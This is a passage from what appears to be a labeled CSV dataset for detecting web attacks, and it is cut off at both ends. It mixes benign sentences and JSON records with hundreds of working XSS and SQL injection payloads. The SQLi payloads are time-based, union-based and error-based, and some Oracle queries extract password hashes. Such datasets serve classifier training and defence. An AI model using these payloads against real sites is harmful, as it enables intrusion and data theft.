Index.",3,normal,26181 "On Virgin America, Main Cabin Select gets you a complimentary checked bag, priority boarding, a couple extra inches of legroom, select complimentary food and drinks and in-flight entertainment.",3,normal,25837 <i id=x tabindex=1 onbeforedeactivate=alert(1)></i><input autofocus>,1,XSS,2625 <button onMoveEnd=javascript:alert(1)>,1,XSS,8537 "1"" ) as mszg where 6184 = 6184 rlike sleep ( 5 ) --",2,SQLi,18325 "1%' ) ) union all select null,null,null,null,null,null,null,null--",2,SQLi,16639 "<rtc onmousemove=""alert(1)"">test</rtc>",1,XSS,8374 "1%"" ) and 7533 = 7533 and ( ""%"" = """,2,SQLi,20048 "<style>:target {color: red;}</style><frameset id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></frameset>",1,XSS,739 "{""id"":null,""firstName"":""Helen"",""lastName"":""Ho"",""address"":""400 Monroe St, Hoboken, NJ 07030"",""city"":""373"",""telephone"":""6490486526""}",3,normal,27414 1' ) as wquy where 2518 = 2518,2,SQLi,20603 "admin"" or 1 = 1--",2,SQLi,22093 "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( ( '%' = '",2,SQLi,14081 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20",2,SQLi,14903 "select * from generate_series ( 7536,7536,case when ( 7536 = 7523 ) then 1 else 0 end ) limit 1--",2,SQLi,14273 "1"" and 9198 = 9198--",2,SQLi,21765 Select a destination for our next adventure.,3,normal,24009 Update status.,3,normal,23027 a29b1%3balert(888)//a62b7156d82,1,XSS,9516 "-3438"" ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ""nxiv"" = ""nxiv",2,SQLi,10211 "<a draggable=""true"" ondrag=""alert(1)"">test</a>",1,XSS,6497 <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&,1,XSS,757 "{""id"":null,""name"":""note""}",3,normal,26785 Sort results where relevant.,3,normal,23306 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13--",2,SQLi,15826 I want to select a song for our dance routine.,3,normal,23876 Modify the account settings.,3,normal,22681 "<basefont onmouseout=""alert(1)"">test</basefont>",1,XSS,6202 "select * from users where id = 1.%@ union select 1,version ( ) -- 1",2,SQLi,16477 %f6%22%20onmouseover%3dprompt(941634)%20,1,XSS,8087 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25",2,SQLi,15071 or pg_SLEEP(5)#,2,SQLi,22162 <small id=x tabindex=1 onfocusin=alert(1)></small>,1,XSS,5684 Controller will launch in closed beta for select customers in October.,3,normal,26269 "1"" and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ""ssfu"" = ""ssfu",2,SQLi,15677 "{""id"":null,""name"":""AlakazamMega Alakazam""}",3,normal,27566 -9556' ) where 2472 = 2472 or ( 2883 = 9968 ) *9968--,2,SQLi,18088 <video onpointerleave=alert(1)>XSS</video>,1,XSS,7560 <div onpointermove=alert(1)>XSS</div>,1,XSS,8572 <body ontouchend=alert(1)>,1,XSS,9664 "select count ( * ) from generate_series ( 1,5000000 ) and ( ""jzmg"" = ""jzmg",2,SQLi,15758 <textarea onpaste=alert(1) autofocus></textarea>,1,XSS,5963 1' ) ) as grne where 9003 = 9003 order by 1--,2,SQLi,19011 "You simply click ""Select > Subject"" and Photoshop will do the rest.",3,normal,25071 <span onpointerenter=alert(1)>XSS</span>,1,XSS,7871 "<div draggable=""true"" contenteditable>drag me</div><tt ondragover=alert(1) contenteditable>drop here</tt>",1,XSS,1271 "1 ) as rtpl where 1262 = 1262 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,13757 "1"" ) ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ""gxqq"" = ""gxqq",2,SQLi,12721 ORDER BY 28#,2,SQLi,22322 <button onpointerleave=alert(1)>XSS</button>,1,XSS,7001 "1%' ) ) ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11307 "<nav onmouseout=""alert(1)"">test</nav>",1,XSS,8672 "{""id"":null,""firstName"":""Ayodhyala"",""lastName"":""Bhaskara Sri Vatsav"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26877 "-5706"" ) ) union all select 2013,2013,2013,2013#",2,SQLi,18691 <ins onpointerup=alert(1)>XSS</ins>,1,XSS,9048 Where did you find that stylish boutique?,3,normal,23726 "{""id"":null,""firstName"":""Datok Yusof"",""lastName"":""Yusof"",""address"":""73 W Barstow Ave"",""city"":""172"",""telephone"":""4481480847""}",3,normal,27206 I selected the perfect gift.,3,normal,23003 "<html onpaste=""alert(1)"" contenteditable>test</html>",1,XSS,5129 <rp onpointerup=alert(1)>XSS</rp>,1,XSS,9330 "<style>@keyframes x{}</style><iframe style=""animation-name:x"" onanimationend=""alert(1)""></iframe>",1,XSS,1547 "<style>:target {color: red;}</style><basefont id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></basefont>",1,XSS,741 "1' ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( 'eiau' = 'eiau",2,SQLi,11596 "1'+ ( select 'nhlx' where 2291 = 2291 or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) ) +'",2,SQLi,10899 "<style>@keyframes x{}</style><div style=""animation-name:x"" onanimationstart=""alert(1)""></div>",1,XSS,1676 "select * from users where id = 1 or \.<$ union select 1,@@VERSION -- 1",2,SQLi,16145 "<;SCRIPT "";a=';>;';""; SRC="";http://ha.ckers.org/xss.js"";>;<;/SCRIPT>;",1,XSS,2569 "<track oncontextmenu=""alert(1)"">test</track>",1,XSS,6987 "<script onmouseover=""alert(1)"">test</script>",1,XSS,6798 1'+ ( select 'jkgf' where 7487 = 7487,2,SQLi,19926 "<small onpaste=""alert(1)"" contenteditable>test</small>",1,XSS,4734 "<div draggable=""true"" contenteditable>drag me</div><template ondragover=alert(1) contenteditable>drop here</template>",1,XSS,775 "-8117' union all select 9945,9945,9945,9945,9945,9945,9945#",2,SQLi,17273 <sup onpointerenter=alert(1)>XSS</sup>,1,XSS,8524 Select toppings carefully.,3,normal,24427 "-9496 ) ) ) or elt ( 7511 = 3951,3951 ) and ( ( ( 3514 = 3514",2,SQLi,17049 "<EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""></EMBED>",1,XSS,20 <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>,1,XSS,2246 "<legend onbeforepaste=""alert(1)"" contenteditable>test</legend>",1,XSS,3205 "<html xmlns=""http://www.w3.org/1999/xhtml"">",1,XSS,7291 "<font onkeyup=""alert(1)"" contenteditable>test</font>",1,XSS,5206 "1 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )",2,SQLi,13732 "<source onmouseover=""alert(1)"">test</source>",1,XSS,6926 from,3,normal,23108 "call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( 'yqrt' like 'yqrt",2,SQLi,12022 "1"" where 3484 = 3484 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11221 select ( case when ( 7163 = 1777 ) then 1 else 7163* ( select 7163 from master..sysdatabases ) end ) --,2,SQLi,13992 Where's the drugstore?,3,normal,23626 "1"" ) ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ( ""nbfe"" = ""nbfe",2,SQLi,12945 "<strike onmouseleave=""alert(1)"">test</strike>",1,XSS,6668 "<plaintext onkeyup=""alert(1)"" contenteditable>test</plaintext>",1,XSS,3242 "-1863' ) or make_set ( 9354 = 9354,7185 ) and ( 'whwv' = 'whwv",2,SQLi,16953 "<picture draggable=""true"" ondragend=""alert(1)"">test</picture>",1,XSS,3311 "-6431' or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and 'ixix' like 'ixix",2,SQLi,10382 "<style>@keyframes slidein {}</style><object style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></object>",1,XSS,365 "1%' ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( '%' = '",2,SQLi,11041 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i",2,SQLi,11813 "<slot onkeydown=""alert(1)"" contenteditable>test</slot>",1,XSS,4728 "<input name=""secret"" type=""password"">",1,XSS,8741 """ ) or benchmark ( 10000000,MD5 ( 1 ) ) #",2,SQLi,19348 1 ) ) ) and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #,2,SQLi,16879 "&lt;SCRIPT \""a='&gt;'\"" SRC=\""http&#58;//ha&#46;ckers&#46;org/xss&#46;js\""&gt;&lt;/SCRIPT&gt;",1,XSS,1643 Save up to 37% off select Best Selling Arthritis Gloves,3,normal,25717 "<div draggable=""true"" contenteditable>drag me</div><blink ondrop=alert(1) contenteditable>drop here</blink>",1,XSS,1174 <menu id=x tabindex=1 onbeforeactivate=alert(1)></menu>,1,XSS,4502 "1 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,13489 The International Olympic Committee will select a host in 2017.,3,normal,25428 "1"" ) where 3390 = 3390",2,SQLi,21443 "<applet onbeforecopy=""alert(1)"" contenteditable>test</applet>",1,XSS,3366 """)))) waitfor delay '0:0:20' --",2,SQLi,20391 "1"" ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ""nnmz"" like ""nnmz",2,SQLi,12689 "<style>@keyframes x{}</style><colgroup style=""animation-name:x"" onanimationend=""alert(1)""></colgroup>",1,XSS,1412 "1"" ) ) as dfwi where 9703 = 9703 or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12503 AnD SLEEP(5) ANd '1,2,SQLi,21919 <address onpointerdown=alert(1)>XSS</address>,1,XSS,6669 "1 or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) # lgoz",2,SQLi,11356 "-9408%"" ) ) union all select 1841,1841,1841,1841,1841,1841--",2,SQLi,17223 "-3433' ) where 8307 = 8307 union all select 8307,8307,8307,8307,8307,8307,8307,8307--",2,SQLi,14924 <footer id=x tabindex=1 ondeactivate=alert(1)></footer><input id=y autofocus>,1,XSS,2133 "<handler xmlns:ev=""http://www.w3.org/2001/xml-events"" ev:event=""load"">alert(94)</handler>",1,XSS,1799 "-8098%' ) union all select 5697,5697,5697,5697,5697,5697,5697,5697,5697,5697#",2,SQLi,15402 <frame onpointerdown=alert(1)>XSS</frame>,1,XSS,7730 "<figure oncopy=""alert(1)"" contenteditable>test</figure>",1,XSS,4577 "<LINK REL=""stylesheet"" HREF=""javascript:alert('');"">",1,XSS,5192 <span onpointerdown=alert(1)>XSS</span>,1,XSS,8170 "-7637"" union all select 8498,8498,8498--",2,SQLi,19530 "1'+ ( select 'kqnj' where 9483 = 9483 or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,15756 "1"" ) as zhlf where 4119 = 4119 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12434 "<meta charset=""x-imap4-modified-utf7"">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi",1,XSS,525 "<summary draggable=""true"" ondragenter=""alert(1)"">test</summary>",1,XSS,3091 Select the ideal lighting for your photos.,3,normal,24043 "1"" ) as vcir where 6275 = 6275 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11643 "`>ABC<div style=""font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';"">DEF",1,XSS,1998 "select * from users where id = 1 or ""{{"" or 1 = 1 -- 1",2,SQLi,17940 "1"" ) ) as czzg where 5483 = 5483 and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --",2,SQLi,11843 "-8684 union all select 9519,9519,9519,9519--",2,SQLi,19129 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( PASSWORD ) FROM ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ ) WHERE LIMIT = 1 ) ) AND 'i' = 'i",2,SQLi,11626 "<plaintext onkeypress=""alert(1)"" contenteditable>test</plaintext>",1,XSS,2833 <menu onpointermove=alert(1)>XSS</menu>,1,XSS,8272 "<figure onmouseup=""alert(1)"">test</figure>",1,XSS,7492 1 RLIKE SLEEP(5),2,SQLi,22130 I should select a normal statement,3,normal,26072 Select a song to listen to.,3,normal,23992 "<style>:target {color:red;}</style><map id=x style=""transition:color 1s"" ontransitionend=alert(1)></map>",1,XSS,1301 <img src ?itworksonchrome?\/onerror = alert(1),1,XSS,6275 "<isindex x=""javascript:"" onmouseover=""alert(XSS)"">",1,XSS,5501 <details onpointerleave=alert(1)>XSS</details>,1,XSS,6449 "select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) ) +'",2,SQLi,15637 "1"" ) where 6809 = 6809 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) --",2,SQLi,15150 "Ahead, enjoy a few select photos of the magical event.",3,normal,26398 "select * from users where id = 1 or ""??"" or 1 = 1 -- 1",2,SQLi,17888 "-4770 ) ) ) union all select 6356,6356,6356,6356,6356#",2,SQLi,18009 -4262%' ) ) ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( '%' = ',2,SQLi,10175 `'><script>\x20javascript:alert(1)</script>,1,XSS,7070 Select the best course for your career.,3,normal,24209 -8233' or 9538 = 1882#,2,SQLi,21529 "1"" ) ) union all select null,null--",2,SQLi,20069 "1 ) ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( ( ( 6556 = 6556",2,SQLi,15140 <button onRepeat=javascript:alert(1)>,1,XSS,8750 "<pre onpaste=""alert(1)"" contenteditable>test</pre>",1,XSS,5682 "1, ( select ( case when ( 9644 = 9644 ) then dbms_pipe.receive_message ( chr ( 75 ) ||chr ( 78 ) ||chr ( 104 ) ||chr ( 98 ) ,5 ) else 1/ ( select 0 from dual ) end ) from dual )",2,SQLi,11573 1'|| ( select 'ptfi' from dual where 2234 = 2234 and 2006 = 2006,2,SQLi,16805 "<style>@keyframes x{}</style><shadow style=""animation-name:x"" onanimationend=""alert(1)""></shadow>",1,XSS,1539 "1%"" union all select null,null,null,null,null#",2,SQLi,18914 "{""id"":null,""firstName"":""Gregory"",""lastName"":""Lim"",""address"":""9 Norristown Rd"",""city"":""110"",""telephone"":""1975098206""}",3,normal,27516 ORDER BY 14--,2,SQLi,22237 "<del onkeyup=""alert(1)"" contenteditable>test</del>",1,XSS,5557 "<details draggable=""true"" ondragenter=""alert(1)"">test</details>",1,XSS,3012 "select * from users where id = 1 or ""{ ( "" = 1 or 1 = 1 -- 1",2,SQLi,17131 "1%' ) ) union all select null,null,null,null,null,null,null,null#",2,SQLi,16708 "Whether you choose to select the pattern in secret or ask the parents for their preferences, you really can't go wrong!",3,normal,25140 "<body onunload=""javascript:alert('XSS');"">",1,XSS,7331 "1' where 6953 = 6953 or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12510 <table id=x tabindex=1 onbeforeactivate=alert(1)></table>,1,XSS,4187 "In order to avoid the intestine strife so common in Italian civic life, it soon became the custom to select a stranger to fill this position.",3,normal,26009 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#",2,SQLi,15170 "<s onclick=""alert(1)"">test</s>",1,XSS,9552 "1' where 1628 = 1628 and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11520 "1 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )",2,SQLi,13671 "In the general consular service appointments are sometimes made to the higher offices from the ranks, but more usually from a select list of nominees, who must pass a qualifying examination.",3,normal,26000 She picked up some groceries from the market.,3,normal,23749 "His select works have been published in io volumes (2nd ed., 1885-1896).",3,normal,26099 "1' and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and 'dubu' like 'dubu",2,SQLi,13171 "<big draggable=""true"" ondragleave=""alert(1)"">test</big>",1,XSS,4584 He pointed out that the performance of the Consumer Staples Select Sector SPDR Fund and Financial Select Sector SPDR Fund began to diverge in recent weeks.,3,normal,26118 "<area oncontextmenu=""alert(1)"">test</area>",1,XSS,7370 "-9606 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) # iuij",2,SQLi,10705 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><frameset id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></frameset>",1,XSS,145 "{""id"":null,""name"":""Ducklett""}",3,normal,27345 "-4639"" ) ) ) or 8550 = 9348",2,SQLi,20908 Select your leader.,3,normal,24842 <q onpointerover=alert(1)>XSS</q>,1,XSS,9347 "( select * from generate_series ( 4990,4990,case when ( 4990 = 5065 ) then 1 else 0 end ) limit 1 )",2,SQLi,14165 "<style>:target {color:red;}</style><menu id=x style=""transition:color 1s"" ontransitionend=alert(1)></menu>",1,XSS,1214 -3988' ) ) union all select 1113#,2,SQLi,20220 Select your field.,3,normal,24862 "<rb onmouseup=""alert(1)"">test</rb>",1,XSS,9264 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--",2,SQLi,14110 "In the menu, find the name of your Mac and select.",3,normal,25999 Choose fields where needed.,3,normal,23263 "1' ) and elt ( 3528 = 3566,3566 )",2,SQLi,20191 "When you've finished, select ""Done"" and press X, or press R2.5.",3,normal,25143 "<listing oncontextmenu=""alert(1)"">test</listing>",1,XSS,5996 select * from master..sysserverse,2,SQLi,20175 "<select onkeyup=""alert(1)"" contenteditable>test</select>",1,XSS,4274 "-2364'+ ( select 'qdut' where 7560 = 7560 union all select 7560,7560,7560,7560,7560--",2,SQLi,14947 -1304' ) union all select 7639#,2,SQLi,20419 "<style>:target {color: red;}</style><acronym id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></acronym>",1,XSS,788 "1 ) ) as jrzr where 5194 = 5194 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11073 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#",2,SQLi,14809 -5820' ) ) as lkik where 4044 = 4044 or 7156 = 9197--,2,SQLi,18124 "-3505"" ) or 5290 = 3436--",2,SQLi,21147 select ( case when ( 4297 = 9086 ) then 4297 else 1/ ( select 0 ) end ) --,2,SQLi,15816 "1' ) where 4297 = 4297 or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12403 <cite onpointerenter=alert(1)>XSS</cite>,1,XSS,7856 Penney has also struggled to select the right assortment of inventory.,3,normal,25790 Select a scenic spot.,3,normal,22728 "1"" ) ) ) or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13040 1' ) as irck where 3660 = 3660 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) --,2,SQLi,14897 "1' where 2123 = 2123 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14283 "select pg_sleep ( 5 ) and ( ""tpry"" = ""tpry",2,SQLi,19313 "<wbr draggable=""true"" ondragleave=""alert(1)"">test</wbr>",1,XSS,4628 "-1366' or make_set ( 9354 = 9354,7185 ) and 'abre' = 'abre",2,SQLi,17404 ) ) or pg_sleep ( __TIME__ ) --,2,SQLi,20397 Select a new hobby to explore.,3,normal,24040 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><datalist id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></datalist>",1,XSS,156 "1"" ) where 1666 = 1666 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11492 "1"" ) where 9447 = 9447",2,SQLi,21396 <svg><address onload=alert(1)></address>,1,XSS,8058 Insert the USB stick.,3,normal,22762 <rt onpointerenter=alert(1)>XSS</rt>,1,XSS,8929 "javascript:alert()//\""//`//'//""//--></style></select></noscript></noembed></template></title></textarea></script><iframe/srcdoc=""<svg/onload=alert()>""><frame/onload=alert()>*/ alert()//",1,XSS,158 ORDER BY 23--,2,SQLi,22246 "<summary onbeforecopy=""alert(1)"" contenteditable>test</summary>",1,XSS,3087 Select the link.,3,normal,22889 "<video autoplay controls onseeked=alert(1)><source src=""validvideo.mp4"" type=""video/mp4""></video>",1,XSS,1554 "1 ) procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,13417 "<style>:target {transform: rotate(180deg);}</style><element id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></element>",1,XSS,558 <strong id=x tabindex=1 ondeactivate=alert(1)></strong><input id=y autofocus>,1,XSS,2150 "1 ) ) ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12011 "javascript:/*-->'//""//`//\""//</title></textarea></style></noscript></script></noembed></template><script>/*<frame/<svg */ onload=alert()//</script>",1,XSS,497 Where's the roller rink?,3,normal,23611 <form id=x tabindex=1 ondeactivate=alert(1)></form><input id=y autofocus>,1,XSS,2323 "1' where 5786 = 5786 and elt ( 1210 = 1210,sleep ( 5 ) ) --",2,SQLi,17320 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><menuitem id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></menuitem>",1,XSS,153 "{""id"":null,""name"":""my""}",3,normal,26784 "{""id"":null,""name"":""Leavanny""}",3,normal,27354 Update your profile picture with the new one.,3,normal,22934 "<style>:target {color:red;}</style><th id=x style=""transition:color 1s"" ontransitionend=alert(1)></th>",1,XSS,1366 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8--",2,SQLi,18146 1%' ) waitfor delay '0:0:5' and ( '%' = ',2,SQLi,19409 1' ) ) or sleep ( 5 ) and ( ( 'uzhd' like 'uzhd,2,SQLi,18823 select ( case when ( 6434 = 3877 ) then 6434 else 1/ ( select 0 ) end ) --,2,SQLi,15720 "1' ) union all select null,null,null,null#",2,SQLi,19291 "<select draggable=""true"" ondragend=""alert(1)"">test</select>",1,XSS,3722 <keygen onpointerdown=alert(1)>XSS</keygen>,1,XSS,7130 "<Input value = """" type = text>",1,XSS,9536 "1' ) ) union all select null,null,null,null,null,null,null#",2,SQLi,17296 "<q onbeforecopy=""alert(1)"" contenteditable>test</q>",1,XSS,5473 "-5493"" ) ) union all select 8001,8001--",2,SQLi,19609 1' and 2316 = 7236,2,SQLi,22061 "<form onkeydown=""alert(1)"" contenteditable>test</form>",1,XSS,4825 "1%' ) ) union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,15503 "1"" ) ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( ( ""fpkm"" like ""fpkm",2,SQLi,12677 "-7813"" ) ) as yvyl where 5172 = 5172 union all select 5172,5172#",2,SQLi,16751 "<code draggable=""true"" ondragstart=""alert(1)"">test</code>",1,XSS,4138 Show me where it's hosted.,3,normal,23299 "1 and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,19596 "1, ( case when 5514 = 9602 then 1 else null end )",2,SQLi,18631 "1 ) where 2741 = 2741 and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12412 <legend id=x tabindex=1 ondeactivate=alert(1)></legend><input id=y autofocus>,1,XSS,2123 <xss id=x tabindex=1 onfocus=alert(1)></xss>,1,XSS,6861 "<style>:target {color: red;}</style><head id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></head>",1,XSS,994 AND 1 = utl_inaddr.get_host_address ( ( SELECT COUNT ( DISTINCT ( table_name ) ) FROM sys.all_tables ) ) AND 'i' = 'i,2,SQLi,13297 "-6770' ) ) union all select 1845,1845,1845,1845,1845,1845,1845,1845,1845#",2,SQLi,15895 "( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( ""avyw"" = ""avyw",2,SQLi,16173 "-5832"" ) or 1650 = 9011--",2,SQLi,21142 "1"" ) and 4760 = 2922",2,SQLi,21799 "1%"" ) ) union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,15654 "<tbody onmousemove=""alert(1)"">test</tbody>",1,XSS,7369 "select * from users where id = 1 or ""1_"" or 1 = 1 -- 1",2,SQLi,17873 "Select maple mahogany shaded back and sides, cellulose bound top, rosewood bridge fitted with compensating saddle.",3,normal,25623 "<section onkeydown=""alert(1)"" contenteditable>test</section>",1,XSS,3567 <xss contenteditable onbeforeinput=alert(1)>test,1,XSS,5842 "-1710"" ) ) as cvky where 1858 = 1858 union all select 1858,1858--",2,SQLi,16691 "After uploading, right click and select ""Open with,"" then select ""Google Slides.""",3,normal,26402 "1 ) as obhj where 1789 = 1789 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --",2,SQLi,12885 select pg_sleep ( 5 ) and ( 'vnss' like 'vnss,2,SQLi,19008 <svg><thead 